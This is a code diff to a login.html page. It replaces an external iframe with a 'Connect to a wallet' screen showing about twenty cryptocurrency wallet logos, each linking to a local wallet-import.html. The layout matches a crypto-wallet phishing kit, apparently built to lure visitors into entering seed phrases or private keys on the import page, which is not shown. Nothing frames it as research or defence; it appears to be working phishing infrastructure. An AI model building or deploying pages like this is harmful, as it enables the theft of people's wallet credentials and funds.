--- a/login.html
+++ b/login.html
@@ -47,15 +47,38 @@
     <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
 
 <style>
-body {}
+body {background-color: rgb(255, 255, 255);}
 
-.logox {margin-bottom:1px;}
+.logox {margin-bottom:15px;}
 
 </style>
-<body class="w3-light-grey" align="center"style="width:100%;" style="margin-top:0px;" background="https://ia601503.us.archive.org/6/items/bgn_20220320/bgn.png" >
-</body>
+<body class="w3-light-grey" align="center"style="width:100%;" >
+</body><br>
 
-<iframe src="https://wn3nbm.csb.app/ghostc.html" width="100%" height="100%" style="border-radius:20px; border:none;">
+<b><p style=" font-family:verdana; font-size:13px;">Connect to a wallet</p><br></b>
 
-</iframe>
+<a class="logox" href="./wallet-import.html"><img src="./metamask.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./trust.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./coinbase.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./binance.PNG" style="width:620px; border-radius: 0x;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./blockchain.PNG" style="width:620px; border-radius: 50px;" style="margin-left:0px;"><br>
+<a  class="logox" href="./wallet-import.html"><img src="./crypto.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+
+<a class="logox" href="./wallet-import.html"><img src="./bitpay.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./imtoken.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./infinito.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./keyring.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./nash.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./ownbit.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+
+<a class="logox" href="./wallet-import.html"><img src="./safepal.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./Spark.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./torus.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+
+<a class="logox" href="./wallet-import.html"><img src="./walletio.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./Argent.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./bitkeep.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br>
+<a class="logox" href="./wallet-import.html"><img src="./aktion.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br><br>
+<a class="logox" href="./wallet-import.html"><img src="./otherwallet.PNG" style="width:620px; border-radius: 0px;" style="margin-left:0px;"><br><br>
+
 </html>
